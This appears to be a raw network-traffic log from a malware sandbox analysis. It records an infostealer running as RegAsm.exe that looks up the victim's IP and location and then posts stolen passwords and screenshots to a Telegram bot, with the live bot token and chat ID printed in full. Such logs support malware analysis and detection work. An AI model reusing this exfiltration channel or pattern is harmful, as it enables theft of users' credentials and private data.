                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            108192.168.2.450255132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:55.222292900 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:55.903985023 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            109192.168.2.450258132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:57.559390068 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:58.239774942 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:58 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.449731104.21.112.14437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:37:55 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                            Host: reallyfreegeoip.org
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:37:55 UTC853INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:37:55 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 362
                                                                            Connection: close
                                                                            Age: 1733864
                                                                            Cache-Control: max-age=31536000
                                                                            cf-cache-status: HIT
                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IjTZGpmtpWA9emXwuOFHsYBsOaejC%2BMVRWd4kdbBPBL3vCHbGNjZVU5oZBFkwhPtUp3ZTqaVKfon6d6NJi7jV49hISCasKs6ZD8NnExPbyTxrUQzbVLxHxpy0kNfmwOLwvvzM%2FVT"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8ff3cb759d07c34f-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1520&min_rtt=1503&rtt_var=576&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1942781&cwnd=181&unsent_bytes=0&cid=d80ad2205745a4aa&ts=209&x=0"
                                                                            2025-01-09 10:37:55 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.449732149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:04 UTC295OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                            Content-Type: multipart/form-data; boundary================8dd306fc847fe8d
                                                                            Host: api.telegram.org
                                                                            Content-Length: 1088
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:04 UTC1088OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 30 36 66 63 38 34 37 66 65 38 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                            Data Ascii: --===============8dd306fc847fe8dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                            2025-01-09 10:38:04 UTC388INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:04 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 553
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                            2025-01-09 10:38:04 UTC553INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 35 39 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 34 32 33 32 37 35 33 32 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 72 65 73 6e 65 77 5f 62 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 52 65 73 6e 65 77 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 30 38 38 37 35 34 37 33 30 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 66 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 52 65 61 6c 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 61 7a 74 31 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 34 31 39 30 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22
                                                                            Data Ascii: {"ok":true,"result":{"message_id":3599,"from":{"id":6423275328,"is_bot":true,"first_name":"resnew_bot","username":"Resnewbot"},"chat":{"id":5088754730,"first_name":"Mf","last_name":"Real","username":"Cazt101","type":"private"},"date":1736419084,"document"


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.449734149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:05 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd3092a11feff8
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
                                                                            2025-01-09 10:38:05 UTC16355OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 30 39 32 61 31 31 66 65 66 66 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 6a 6f 6e 65 73 5c 44 6f 63 75 6d 65 6e 74 73 5c 4e 4f 56 41 5c 43 61 70 74 75 72 65 64 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48
                                                                            Data Ascii: --===============8dd3092a11feff8Content-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\NOVA\Captured.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGBgAMAapH
                                                                            2025-01-09 10:38:05 UTC16355OUTData Raw: a1 27 79 27 69 07 3e 2f 51 47 cb 58 7b 48 e6 69 ad 62 92 7a be 17 63 bd 04 84 35 8a 4b f2 a9 d2 8f b5 ec cf bc e6 88 d1 4a e0 81 2a f3 24 e7 d4 12 a3 45 00 e6 aa bd 66 ec 79 c4 91 87 c8 3f 5a e5 31 07 f4 89 21 06 4b 01 28 d9 27 a9 e7 b2 4f f3 82 18 79 e4 33 9e a8 00 fc fc 95 81 dc 1b 85 6b 1f aa 4e b9 ee 91 ea 94 1b 1f 4b 3c 5e 9d 75 fb cf aa ab 1e f8 79 75 c7 4f 7f 5e 5d bd e6 91 a1 95 7e fd c8 f7 15 49 bb 49 62 9f 7f 36 d4 c2 af 10 80 54 ff 3d fe e5 ba ff f4 79 d5 b3 37 ee 3f a3 0a f0 b9 3b ea 2a c0 17 7e f4 fe ea 05 04 e0 4f 10 80 cd 31 e0 56 00 7e ba fa ed 03 07 86 22 6f b6 44 12 6f be 91 78 8b a4 dc 28 e8 05 1e c0 51 de 28 67 14 b4 47 24 f2 66 cb 7c 09 c0 53 4f 3d b5 7a f9 b7 bf b5 4a bf 5a 00 4e 8f e3 a3 bf e3 56 ff 65 01 d8 c8 bf 56 00 1e 7d f4 82
                                                                            Data Ascii: 'y'i>/QGX{Hibzc5KJ*$Efy?Z1!K('Oy3kNK<^uyuO^]~IIb6T=y7?;*~O1V~"oDox(Q(gG$f|SO=zJZNVeV}
                                                                            2025-01-09 10:38:05 UTC16355OUTData Raw: 78 25 0a c0 48 f2 0d 23 92 7e 4e 29 f4 4a d6 a6 00 8c 04 df 30 16 04 e0 3d 3d 22 af 5f 7c 18 91 fc 83 48 f4 f5 63 41 00 a6 39 93 7a d0 2f ee 55 80 03 41 e2 35 02 b0 94 80 12 80 5e 01 e8 f2 cf 05 a0 84 5e 84 e6 25 f3 3c 5f fb 97 b9 82 2a 40 d6 b8 f4 73 96 bd f5 b6 16 97 80 92 76 e3 20 a9 07 f4 15 73 ca 5c 97 7d 3a 0a 4c 1f c9 27 e1 a7 79 c5 24 09 c9 95 00 d4 33 04 fd 99 82 c0 b1 5f 97 7e 0e 02 90 4a be 52 f4 d1 d7 18 31 a8 6a 40 e1 63 97 7d 25 92 7c 7a 63 30 f2 af 14 80 3a f2 eb 95 7d 8c 25 fb 68 91 7f 5e 15 28 f2 78 d7 b4 be 11 80 aa ea f3 e3 be 88 3f c6 12 82 ca d7 11 60 64 1c 22 6e f9 6e 37 66 74 b4 57 62 0f e1 27 99 47 1f 5c e2 b5 22 af 41 73 9a 57 f5 9f 62 e5 3a de 06 8c d4 e3 b8 af c4 9f 44 9f f7 25 fd 24 0c 25 0d 91 79 12 80 aa 00 44 f6 d1 42 3e e6
                                                                            Data Ascii: x%H#~N)J0=="_|HcA9z/UA5^^%<_*@sv s\}:L'y$3_~JR1j@c}%|zc0:}%h^(x?`d"nn7ftWb'G\"AsWb:D%$%yDB>
                                                                            2025-01-09 10:38:05 UTC16355OUTData Raw: 98 05 df cd 3d 2c 7e db 2d 19 fa d1 11 62 c9 c2 fc 8c 40 84 1d f2 ae 91 83 5e 29 48 5c b1 7e 48 fc 49 20 4a 10 22 0c 55 35 58 a2 79 1d 25 56 8c b6 dd 67 1f 24 5f ef 0b 43 bc 7a 50 e3 c5 6f 4a 6b 8c a9 3d d2 75 77 bb ae 5a b4 e7 8d d5 b2 7d d2 f7 93 62 f4 89 77 77 bf 3e cf d1 12 63 ce 2b 00 4b 24 fe 5c 02 92 af 35 08 40 55 f5 e5 6a 3e a3 8d b7 15 7e 88 bd ab ab a5 bb 5d 53 2d db 1d c1 87 b8 63 ee aa 1c a3 df dd f1 f2 6a 6a a7 2b f2 78 79 ba 5f 44 df 8a 74 9f 2b d3 7d d2 b2 8f 8e 02 d3 97 0c 24 77 5a 08 5e 9d 8f 06 d3 ba 5c ec c7 14 e2 0d 71 b7 1b 82 30 ad df f1 aa aa bb fd 15 19 fa cc c1 62 44 5d 82 18 68 cc fa ce 76 97 67 e8 03 6b 69 99 67 ad f2 e9 97 d7 d0 fe 2e 02 25 0a 15 cb 42 b0 11 73 a5 b4 a3 a2 8f 96 39 84 9f aa 02 89 d1 92 ef 52 4f 28 be 84 17 66
                                                                            Data Ascii: =,~-b@^)H\~HI J"U5Xy%Vg$_CzPoJk=uwZ}bww>c+K$\5@Uj>~]S-cjj+xy_Dt+}$wZ^\q0bD]hvgkig.%Bs9RO(f
                                                                            2025-01-09 10:38:05 UTC16355OUTData Raw: 5e 22 22 59 75 20 c7 85 93 f7 06 2e 5d 50 7e 4f 03 cb 17 96 fc 4c e2 05 32 49 28 59 fe 46 85 df f2 b9 3d d9 dc 56 d8 15 80 8b 71 58 0b c0 0d 90 89 be 59 ac 91 77 db 20 00 33 69 b7 9d ec 0a c0 f9 2c 22 00 21 95 80 73 c8 44 de 56 58 54 00 ae bc b9 fc 5c 49 5c 32 e9 17 99 27 fb 0e e7 77 00 4a 26 fb 32 90 79 9b 21 13 80 92 09 bf 96 28 f4 66 11 c5 5e 1b 6f c7 91 45 05 20 1c 69 02 30 ca bf 28 00 ad f8 8b f2 0f 10 80 92 09 bf 96 ad 0a c0 38 1f 69 c5 9f 6c b7 00 cc 2a 01 21 ca 3f d8 ac 00 04 8f fd d2 b7 1a 90 3e 02 d0 38 64 02 50 99 d7 56 f7 71 1c 18 1c 93 67 2c ae 69 05 a0 ef fd 73 8c 00 cc 24 a0 15 82 51 d6 29 f5 94 75 1c 0b b6 ca 8f 77 04 32 66 6e cd f1 dd 81 b8 97 c4 aa bf b8 7f db f7 f8 2f 17 84 78 49 08 e2 cf cb 43 14 76 4a bb 28 f6 94 7a c6 a2 c4 b3 55 00
                                                                            Data Ascii: ^""Yu .]P~OL2I(YF=VqXYw 3i,"!sDVXT\I\2'wJ&2y!(f^oE i0(8il*!?>8dPVqg,is$Q)uw2fn/xICvJ(zU
                                                                            2025-01-09 10:38:05 UTC16355OUTData Raw: 23 ca 3d 85 a0 20 06 5b 62 f5 df 4c c9 37 03 aa 01 ad de 9b 05 02 10 b9 17 2b ff 3c f2 ab f0 53 fe 99 c3 18 c1 e7 7b fe 5a e9 27 7d ce 34 99 00 8c 7d a0 cf 45 21 b4 be 03 30 4a 3c a5 9e 55 7d fd dc 0d 53 12 d0 4a 40 2b fd 5c d3 ae 47 00 46 09 d8 0a c0 a3 ca 67 f3 5d 80 08 40 df fd 67 45 20 e2 ae 3d fa ab f4 63 4e f9 27 cc c7 1b 7f c9 a5 8d 02 90 be 63 c5 5f 94 76 ed 98 16 59 67 6c 94 77 61 ae 15 7d ae e5 36 e0 a5 67 5e 33 25 0d 9d ab eb 87 4a bf 58 05 28 88 40 2a fd bc e1 97 16 01 48 8b e8 8b 47 7f 7b e9 17 fb bd cc a3 6d 05 20 37 fd d6 0b 40 9e d1 cf 1b 43 fa 59 01 48 0c 01 38 39 e6 e3 55 e0 29 f9 7c ff 1f 12 af 8a b7 41 0e 66 72 0f da 77 08 d2 af 47 76 4b 1c 90 76 1e d5 45 fa 29 03 39 16 1c 45 1e 31 40 f4 29 fb c8 f7 79 0a c2 28 0d 11 84 c6 5a f1 a6 98
                                                                            Data Ascii: #= [bL7+<S{Z'}4}E!0J<U}SJ@+\GFg]@gE =cN'c_vYglwa}6g^3%JX(@*HG{m 7@CYH89U)|AfrwGvKvE)9E1@)y(Z
                                                                            2025-01-09 10:38:05 UTC16355OUTData Raw: fd 90 7c ca 3f a9 e2 6f 90 81 1c ff ed 05 60 26 f8 d6 63 9b 04 60 5b fd 47 b5 1f c7 81 11 7e d9 2f 24 20 f3 1c 11 a6 1f d7 6e e4 d2 90 c3 52 00 de 80 00 3c 7b a8 fe 43 fe 4d 57 ff 75 df 7f 6f 2f 00 ef be bb 5e 00 f2 c0 0b 4e e9 1e 7c ca ff d6 dd 7f ee 7b bb 7b 6f bb 6d a6 00 bc ec d3 7f dd 5d fe c5 8f 75 1f fe f6 8d 8f 1b 01 78 d6 d9 67 77 07 1f 7e 78 94 57 b4 c8 27 fa b7 de 75 7f f7 0f 87 77 d2 cd e3 d8 0b bf 5b d7 51 d1 16 e3 7f 12 2e b2 60 6c ff be fb ee ef 1e 3a 78 b0 7b d3 5b de 72 44 09 c0 f6 bb f2 e7 ec 2b 00 57 e5 1f d5 81 51 86 ce 15 80 7e 27 03 6b 04 60 fc ae 12 59 b7 13 ac 11 80 b2 46 00 ce a0 0a c0 f2 cf a2 58 11 58 40 ee 55 c1 77 31 ef 05 e4 fd 80 0f 77 7b 2f ed 46 f6 5d fe e8 50 19 d8 5f 32 c2 bb 03 eb 91 61 64 a0 22 b0 40 25 60 ad 08 7c df
                                                                            Data Ascii: |?o`&c`[G~/$ nR<{CMWuo/^N|{{om]uxgw~xW'uw[Q.`l:x{[rD+WQ~'k`YFXX@Uw1w{/F]P_2ad"@%`|
                                                                            2025-01-09 10:38:05 UTC16355OUTData Raw: 88 43 8e 00 23 e8 54 f1 37 23 fc 6c 6d 91 81 cd 5c 23 f5 24 f6 bc f8 03 3f ef 41 16 72 c4 58 fb d1 e6 a3 bf b6 ef 9a 7d 6e 4a ab f7 b4 9f e1 ae f6 9e 76 9e 2d ff bc 00 ac c5 1c c2 0e f1 c7 85 20 db d8 1e b9 4a 6f 80 e4 f3 f3 40 5f 63 f6 a2 af 1c 9f a7 5c 5f cd 07 be ca 4f 73 12 7f 1e 49 40 5d f6 21 e1 a7 ea 3f 2e 07 21 46 a5 9e 44 1f ad 9e e5 27 b1 e7 25 a0 60 2c 18 7b 31 e8 05 21 7d 5d f4 e1 a5 9f aa fc 40 73 aa f8 93 00 cc f2 cf be 97 5c 85 47 ac 48 3a a1 aa 3d fa cc 73 74 57 a2 50 22 10 94 43 3f 12 83 9d bf b8 a2 ad 32 f4 fb e5 b9 d7 fd 7d 2b ed 24 e4 24 ed 90 7c 5e fe d5 72 90 3e 22 4f 63 f2 54 ed e7 f7 93 08 d4 1e 12 80 40 9f 39 ed c5 c5 21 9d d7 5d d1 e6 30 f6 b9 ba 58 c4 c7 e6 f5 0c c0 cb bf 7e 79 16 80 f0 dc 73 cf a5 ef df 72 4f 3a ee ec bf cb 17
                                                                            Data Ascii: C#T7#lm\#$?ArX}nJv- Jo@_c\_OsI@]!?.!FD'%`,{1!}]@s\GH:=stWP"C?2}+$$|^r>"OcT@9!]0X~ysrO:
                                                                            2025-01-09 10:38:05 UTC16355OUTData Raw: 44 91 80 54 02 22 f5 10 7c 92 7c c4 84 a4 1f cf 0d 24 bf ac c9 a2 6e d7 e3 66 60 2c de 7e 5e ea 92 53 9e f9 97 fb c4 ca 9a 1e e1 a7 5c da 1a cb f7 d2 2b 4b 30 84 18 02 0d 29 46 9f 18 48 a0 d5 b2 ac 46 b9 c3 08 40 72 b4 9f d6 f1 da 5e 40 12 a7 2f a2 98 c6 ac e3 d9 83 d1 be c4 fa c5 59 a3 d7 2c 73 ad 00 44 06 d6 b2 0f 98 e3 62 0f 04 1c 20 f0 10 6f 3e e7 dd 5f 74 42 ce 88 e4 1f 30 37 5f 01 68 6b a8 02 d4 6b d0 cf 20 f9 90 80 c8 3f eb 67 f1 17 09 40 20 0f 81 27 24 e2 f6 b6 fe 51 f6 19 11 77 3c db 8f 96 71 8d c4 9f 28 7b 64 18 53 fd a7 e7 03 d2 27 a6 f9 8a 65 01 58 08 a4 de 28 44 d2 cf 13 4b 3f 8f 7d 87 83 08 a5 dd 0c 2f 67 01 38 b1 fe 97 69 f2 dc 5f b7 78 19 d8 23 02 c5 f9 f6 ff 15 a5 42 b0 ad 14 ac aa 02 3b 3c 3b b0 88 c0 88 a9 4d 36 b7 f1 b9 e6 06 e2 0b 9e
                                                                            Data Ascii: DT"||$nf`,~^S\+K0)FHF@r^@/Y,sDb o>_tB07_hkk ?g@ '$Qw<q({dS'eX(DK?}/g8i_x#B;<;M6
                                                                            2025-01-09 10:38:05 UTC16355OUTData Raw: c1 73 69 c5 79 cf a4 a9 73 7e 9d 26 6d 1d ef 71 f2 0c fb fd 2d cf 02 8c 88 84 5f 8d 17 7d be f5 f1 90 93 1f 8f e3 15 91 f4 eb 9c ec c6 91 d4 1b 85 4a e8 8d ca 52 0b 40 9f 0f 91 f4 f3 cc 48 3d 09 bf 1a 9f 33 c3 b2 00 6c c6 2f 77 01 38 4b e8 05 48 fe 79 01 d8 ae 2f 02 70 ea 2f 7f 9a a1 2f f9 d7 e1 e8 ed 22 0b 40 e6 fd 31 60 e5 ce 30 73 13 30 c7 80 fd c5 1f c3 08 40 44 5e 8d c4 a0 97 81 c4 e6 12 80 3a 02 ac 7e 67 81 cf 00 d4 25 20 54 fe 79 24 02 a1 bb f6 96 a6 d2 ef 70 1b 5b cb b8 f3 d6 9b db f8 6a 7b 6f 5e 02 d6 20 f8 a8 f4 5b 65 fb 82 af fa e3 38 30 f2 8f be 17 80 33 cf ff bb 2d 75 0e ba 21 4b 3d 24 1f af 33 7d 38 7b 35 af 27 31 a8 be 2a ff 5a 69 f8 d6 1f 36 97 79 1c 72 73 7b 09 08 62 8f 18 15 7e 12 82 5e f8 81 f2 57 73 4b 32 b7 04 bb a3 be 3a da 4b df 0b
                                                                            Data Ascii: siys~&mq-_}JR@H=3l/w8KHy/p//"@1`0s0@D^:~g% Ty$p[j{o^ [e803-u!K=$3}8{5'1*Zi6yrs{b~^WsK2:K
                                                                            2025-01-09 10:38:06 UTC389INHTTP/1.1 200 OK
                                                                            Server: nginx/1.18.0
                                                                            Date: Thu, 09 Jan 2025 10:38:06 GMT
                                                                            Content-Type: application/json
                                                                            Content-Length: 1837
                                                                            Connection: close
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Access-Control-Allow-Origin: *
                                                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.449736149.154.167.2204437588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2025-01-09 10:38:08 UTC2113OUTPOST /bot6423275328:AAEFALkc3yNmgwbyoG03lPKwIaT4LiLSn38/sendDocument?chat_id=5088754730&caption=user%20/%20SCREENSHOT%20/%208.46.123.189%0D%0A%0D%0A***********************************************************%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20_%20%20%20%20___%20%20%20___%20%20___%20___%20___%20%20%20%20*%0D%0A*%20%20%20%20%20%20Best%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C%20%20/%20_%20%5C%20/%20__%7C/%20__%7C%20__%7C%20_%20%5C%20%20%20*%0D%0A*%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7C%20%7C_%7C%20(_)%20%7C%20(_%20%7C%20(_%20%7C%20_%7C%7C%20%20%20/%20%20%20*%0D [TRUNCATED]
                                                                            Content-Type: multipart/form-data; boundary================8dd30b12863fb9c
                                                                            Host: api.telegram.org
                                                                            Content-Length: 695477
                                                                            Connection: Keep-Alive
